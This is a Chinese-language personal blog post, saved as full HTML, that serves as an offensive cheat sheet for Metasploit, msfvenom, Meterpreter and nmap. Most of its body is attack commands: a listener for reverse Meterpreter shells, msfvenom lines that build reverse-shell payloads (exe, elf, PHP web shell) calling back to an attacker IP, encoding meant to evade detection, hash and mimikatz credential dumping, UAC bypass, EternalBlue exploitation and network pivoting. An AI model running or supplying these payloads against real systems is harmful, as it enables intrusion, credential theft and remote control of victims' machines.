<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="工具使用,">





  <link rel="alternate" href="/atom.xml" title="SG's Blog" type="application/atom+xml">






<meta name="description" content="msfconsole:reverese:123456789use exploit/multi/handler show options set payload windows/x64/meterpreter/reverse_tcp set LHOST [AttackerIP] # 如果是公网vps，这里最好写一个内网ip，否则可能会影响后边load。。看issue里写的set LPORT [Att">
<meta name="keywords" content="工具使用">
<meta property="og:type" content="article">
<meta property="og:title" content="msf&amp;nmap常用基本操作">
<meta property="og:url" content="http://love-sg.me/2018/12/31/msf&nmap常用基本操作/index.html">
<meta property="og:site_name" content="SG&#39;s Blog">
<meta property="og:description" content="msfconsole:reverese:123456789use exploit/multi/handler show options set payload windows/x64/meterpreter/reverse_tcp set LHOST [AttackerIP] # 如果是公网vps，这里最好写一个内网ip，否则可能会影响后边load。。看issue里写的set LPORT [Att">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-03-28T10:06:54.916Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="msf&amp;nmap常用基本操作">
<meta name="twitter:description" content="msfconsole:reverese:123456789use exploit/multi/handler show options set payload windows/x64/meterpreter/reverse_tcp set LHOST [AttackerIP] # 如果是公网vps，这里最好写一个内网ip，否则可能会影响后边load。。看issue里写的set LPORT [Att">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://love-sg.me/2018/12/31/msf&nmap常用基本操作/">





  <title>msf&nmap常用基本操作 | SG's Blog</title><!-- hexo-inject:begin --><!-- hexo-inject:end -->
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <!-- hexo-inject:begin --><!-- hexo-inject:end --><div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">SG's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">一直划水,偶尔学习</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            站点地图
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://love-sg.me/2018/12/31/msf&nmap常用基本操作/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="ShadowGlint">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="SG's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">msf&nmap常用基本操作</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-12-31T00:18:23+08:00">
                2018-12-31
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="msfconsole"><a href="#msfconsole" class="headerlink" title="msfconsole:"></a>msfconsole:</h3><p><strong>reverese:</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/handler </span><br><span class="line">show options </span><br><span class="line">set payload windows/x64/meterpreter/reverse_tcp </span><br><span class="line">set LHOST [AttackerIP] # 如果是公网vps，这里最好写一个内网ip，否则可能会影响后边load。。看issue里写的</span><br><span class="line">set LPORT [AttackerPort] #默认4444端口 </span><br><span class="line"></span><br><span class="line">运行这两条命令后，4444端口会一直在后台处于侦听状态</span><br><span class="line">set ExitOnSession false</span><br><span class="line">exploit -j -z</span><br></pre></td></tr></table></figure></p>
<p><strong>bind:</strong></p>
<p><code>windows/x64/meterpreter/bind_tcp</code></p>
<a id="more"></a>
<p><strong>session</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">在Meterpreter Shell中退出session使用 `exit`；</span><br><span class="line"></span><br><span class="line">在模块界面删除session使用 `session -k sessionID`；</span><br><span class="line"></span><br><span class="line">退到后台是 `background`；</span><br></pre></td></tr></table></figure></p>
<p><strong>scanner</strong></p>
<p>msf下也包含多种扫描技术,端口扫描很多就不说了。主要说下在meterpreter下通常怎样进行主机发现。</p>
<p>最常用的应该就是arp扫：<br>Meterpreter(需要先加条路由,下面会说):<code>run post/windows/gather/arp_scanner RHOSTS=192.168.244.0/24</code><br>Nmap:<code>nmap -sn -PR 192.168.3.0/24 以arp的方式扫描</code><br>CMD:<code># start /b arpscan.exe -t 192.168.3.0/24 &gt;&gt; result.txt</code><br>Msfconsole:<code>use auxiliary/scanner/discovery/arp_sweep</code></p>
<p>域内icmp/tcp/udp啥的也很常用，但底层协议还不是很熟，原因不是很懂。。暂时经验告诉我内网发现经常是arp。。</p>
<p><strong>autoroute:</strong></p>
<p>msf的自动添加路由，实在是神器啊!<br>平时配过服务器网的同学对静态路由应该比较熟悉，<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run autoroute -s ip/24</span><br></pre></td></tr></table></figure></p>
<p>background后route print可以看到已经添加的路由</p>
<p>当然也有autoroute不灵的情况，这时候需要手动指定路由。例:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">route add 172.16.63.0 255.255.255.0 sessionid</span><br></pre></td></tr></table></figure></p>
<p>注意:msf手工设置路由表后，有可能会将添加的路由同步到本机上，造成本机直接可以访问目标机… 这有时候也挺坑的</p>
<p>加完路由就可以正常内网渗透了。或者用msf加个本地sock4代理,再proxychains配好。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">msf exploit(handler) &gt; use auxiliary/server/socks4a </span><br><span class="line"></span><br><span class="line">msf auxiliary(socks4a) &gt; set srvhost 127.0.0.1</span><br><span class="line"></span><br><span class="line">msf auxiliary(socks4a) &gt; set srvport 1080</span><br><span class="line"></span><br><span class="line">msf auxiliary(socks4a) &gt; run</span><br></pre></td></tr></table></figure></p>
<p><strong>hashdump</strong></p>
<p>migrate进程后，读下hash</p>
<p>meterpreter下就记住<code>run post/windows/gather/smart_hashdump</code>以及<code>hashdump</code>就好。<br>至于mimikatz这种神器…就说下几个常用参数</p>
<p>wdigest 读取内存中存放的账号密码明文信息<br>kerberos 获取kerberos用户信息及密码<br>msv 读的是hash值</p>
<p><strong>常用模块</strong><br>这里再说一下目前感觉内网比较常用的17010的几种模块。<br>主要参考<a href="https://www.bodkin.ren/index.php/archives/555/" target="_blank" rel="noopener">这位大佬</a>的文章。</p>
<p>扫描：<code>use auxiliary/scanner/smb/smb_ms17_010</code><br>利用：<br>1.<code>exploit/windows/smb/ms17_010_eternalblue</code><br>2.<code>exploit/windows/smb/ms17_010_psexec</code></p>
<p>这两种攻击exp有啥区别我也不知道，自己操作的时候就是，一个不行换另一个再试试。。有大佬懂还要麻烦指导一下</p>
<p>常用总结：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://www.jianshu.com/p/bad2fc55beff?utm_campaign=maleskine&amp;utm_content=note&amp;utm_medium=seo_notes&amp;utm_source=recommendation</span><br></pre></td></tr></table></figure></p>
<p><strong>提权</strong></p>
<p>列出补丁，也可用suggester系列<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; run post/windows/gather/enum_patches  #查看补丁信息</span><br><span class="line">msf &gt; use exploit/windows/local/ms13_053_schlamperei</span><br><span class="line">msf &gt; set SESSION 2</span><br><span class="line">msf &gt; exploit</span><br><span class="line"></span><br><span class="line">use post/multi/recon/local_exploit_suggester</span><br><span class="line">msf &gt; set LHOST 192.168.1.107</span><br><span class="line">msf &gt; set SESSION 1</span><br><span class="line">msf &gt; exploit</span><br></pre></td></tr></table></figure></p>
<h3 id="msfvenom"><a href="#msfvenom" class="headerlink" title="msfvenom"></a>msfvenom</h3><p><strong>-f [指定payload的输出格式]</strong></p>
<p>按需要的格式进行输出：<br>十六进制hex编码形式 <code>\x0a</code><br>如果用python写exploit，用<code>-f python</code>得到python代码。<br>如果用python写exploit，用<code>-f c</code>得到c代码。<br><code>-f exe\elf</code>就不说了，还有<code>-f psh-reflection</code>生成ps1脚本也挺常用的。</p>
<p>生成一个exe格式的payload，如：<br><code>msfvenom -p windows/meterpreter/bind_tcp -f exe</code></p>
<p><strong>-p [指定攻击载荷名称]</strong></p>
<p>生成payload至少需指定-p 和 -f</p>
<p>除了自带的那些payload外<br><code>-p -</code>可指定自定义的payload ，用 - 代替管道前的标准输入，如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat payload_file.bin | msfvenom -p - -a x86 --platform win -e x86/shikata_ga_nai -f raw</span><br></pre></td></tr></table></figure>
<p><strong>-e [指定编码类型]</strong></p>
<p>也就用过 -e x86/shikata_ga_nai 了</p>
<p><strong>几个简单reverse payload：</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">#win x86 </span><br><span class="line">msfvenom -p windows/meterpreter/reverse_tcp lhost=[AttackerIP] lport=4444 -f exe -o /tmp/1.exe </span><br><span class="line">x86下 -p后加: windows/../.. 没有这种名字的载荷: windows/x86/../.. </span><br><span class="line"></span><br><span class="line">#linux x86 </span><br><span class="line">msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[AttackerIP] LPORT=[AttackerPort] -f elf &gt; 1.elf </span><br><span class="line"></span><br><span class="line">#PHP </span><br><span class="line">msfvenom -p php/meterpreter_reverse_tcp LHOST=[AttackerIP] LPORT=[AttackerPort] -f raw &gt; shell.php </span><br><span class="line">cat shell.php | pbcopy &amp;&amp; echo &apos;&lt;?php &apos; | tr -d &apos;\n&apos; &gt; shell.php &amp;&amp; pbpaste &gt;&gt; shell.php</span><br><span class="line"></span><br><span class="line">#编码</span><br><span class="line">msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b &apos;\x00&apos; LHOST=[AttackerIP] LPORT=[AttackerPort] -f exe &gt; 1.exe</span><br></pre></td></tr></table></figure>
<h3 id="meterpreter"><a href="#meterpreter" class="headerlink" title="meterpreter:"></a>meterpreter:</h3><p>sysinfo</p>
<p>列出受控主机的系统信息</p>
<hr>
<p>getuid&amp;getpid</p>
<p>获得userid和process id</p>
<hr>
<p>use priv</p>
<p>加载特权提升拓展模块，来扩展Meterpreter库</p>
<hr>
<p>getsystem</p>
<p>通过各种攻击向量来提升系统用户权限<br>注意：提权前最好先习惯性的bypassuac<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">msf exploit(multi/handler) &gt; use exploit/windows/local/bypassuac</span><br><span class="line">msf exploit(windows/local/bypassuac) &gt; set session 1</span><br><span class="line">session =&gt; 1</span><br><span class="line">msf exploit(windows/local/bypassuac) &gt; exploit</span><br></pre></td></tr></table></figure></p>
<hr>
<p>execute -f cmd.exe -i</p>
<p>执行cmd.exe命令并进行交互</p>
<hr>
<p>upload file</p>
<p>向目标主机上传文件</p>
<hr>
<p>download file</p>
<p>从目标主机上下载文件</p>
<hr>
<p>run get_local_subnets </p>
<p>获取内网网段信息</p>
<hr>
<h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap:"></a>nmap:</h3><p><strong>批量漏洞扫描：</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">--script=vulners -sV ip</span><br><span class="line">--script=vulscan -sV ip</span><br></pre></td></tr></table></figure></p>
<p><strong>nmap常用参数：</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">-sV:辨识操作系统中运行的服务的类型信息</span><br><span class="line"></span><br><span class="line">-sS:半开扫描，需root</span><br><span class="line"></span><br><span class="line">-sT:三次握手，慢，且目标主机产生大量记录。不需root</span><br><span class="line"></span><br><span class="line">-sn:ping扫描主机， 不进行端口扫描，探测主机存活</span><br><span class="line"></span><br><span class="line">-Pn:no ping，过墙，跳过主机发现。</span><br><span class="line"></span><br><span class="line">--open:只探测状态为open的端口</span><br><span class="line"></span><br><span class="line">-A:aggressive扫描。比较慢</span><br><span class="line"></span><br><span class="line">-O:辨识目标主机的操作系统</span><br><span class="line"></span><br><span class="line">nmap 默认-sP就是ping扫描，如果是在Internet环境中，则应该使用-Pn选项，不要使用ping扫描，因为ICMP数据包通常无法穿透Internet上的网络边界；还可以使用-PU通过对开放的UDP端口进行探测以确定存活的主机。域内icmp还是挺好用的</span><br></pre></td></tr></table></figure>
<p><strong>常用：</strong><br><code>masscan扫描存活 + nmap -sV -sS -Pn --open</code></p>
<p><strong>nmap检测服务:</strong></p>
<p>例 smb:</p>
<p><code>nmap -v -p139,445 --script=*-vuln-*.nse --script-args=unsafe=1 ip -Pn</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#unsafe=1：高强度扫描，可能造成宕机，可选为0（安全扫描） </span><br><span class="line">#-Pn：有防火墙过滤包，也继续进行扫描</span><br></pre></td></tr></table></figure>
<p><strong>Nmap扫心脏滴血：</strong><br><code>nmap -sV --script=ssl-heartbleed ip -p 443</code></p>
<h3 id="MSF-Install"><a href="#MSF-Install" class="headerlink" title="MSF Install"></a>MSF Install</h3><p>记录下安装msf过程，以后新的vps直接无脑复制粘贴就行，postgre密码啥的全都按照下边写的来，这样就不会忘了或乱了。。</p>
<p>下载安装msf</p>
<p>打开终端，进入安装目录</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cd /opt</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb &gt; msfinstall</span><br><span class="line">chmod 755 msfinstall</span><br><span class="line">./msfinstall</span><br></pre></td></tr></table></figure>
<p><strong>安装数据库</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install postgresql</span><br></pre></td></tr></table></figure>
<p>添加数据库&amp;账户密码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">su postgres</span><br><span class="line">createuser msf4 -P</span><br></pre></td></tr></table></figure>
<p>（输入密码&amp;再输入密码 我输入msf）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">createdb --owner=msf4 msf4</span><br><span class="line">exit</span><br></pre></td></tr></table></figure>
<p><strong>配置msf数据库</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">db_connect msf4:msf@localhost/msf4</span><br><span class="line">db_status</span><br></pre></td></tr></table></figure>
<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>这篇也就就当个备忘录，没有姿势，后边会研究下持久化控制的知识</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/工具使用/" rel="tag"># 工具使用</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/12/29/Logistic-Regression-Basic/" rel="next" title="Logistic Regression Basic">
                <i class="fa fa-chevron-left"></i> Logistic Regression Basic
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/01/22/日常学习记录/" rel="prev" title="日常学习记录">
                日常学习记录 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">ShadowGlint</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#msfconsole"><span class="nav-number">1.</span> <span class="nav-text">msfconsole:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#msfvenom"><span class="nav-number">2.</span> <span class="nav-text">msfvenom</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#meterpreter"><span class="nav-number">3.</span> <span class="nav-text">meterpreter:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#nmap"><span class="nav-number">4.</span> <span class="nav-text">nmap:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#MSF-Install"><span class="nav-number">5.</span> <span class="nav-text">MSF Install</span></a></li></ol><li class="nav-item nav-level-2"><a class="nav-link" href="#小结"><span class="nav-number"></span> <span class="nav-text">小结</span></a></li></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ShadowGlint</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script><!-- hexo-inject:begin --><!-- Begin: Injected MathJax -->
<script type="text/x-mathjax-config">
  MathJax.Hub.Config("");
</script>

<script type="text/x-mathjax-config">
  MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
      all[i].SourceElement().parentNode.className += ' has-jax';
    }
  });
</script>

<script type="text/javascript" src="">
</script>
<!-- End: Injected MathJax -->
<!-- hexo-inject:end -->



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
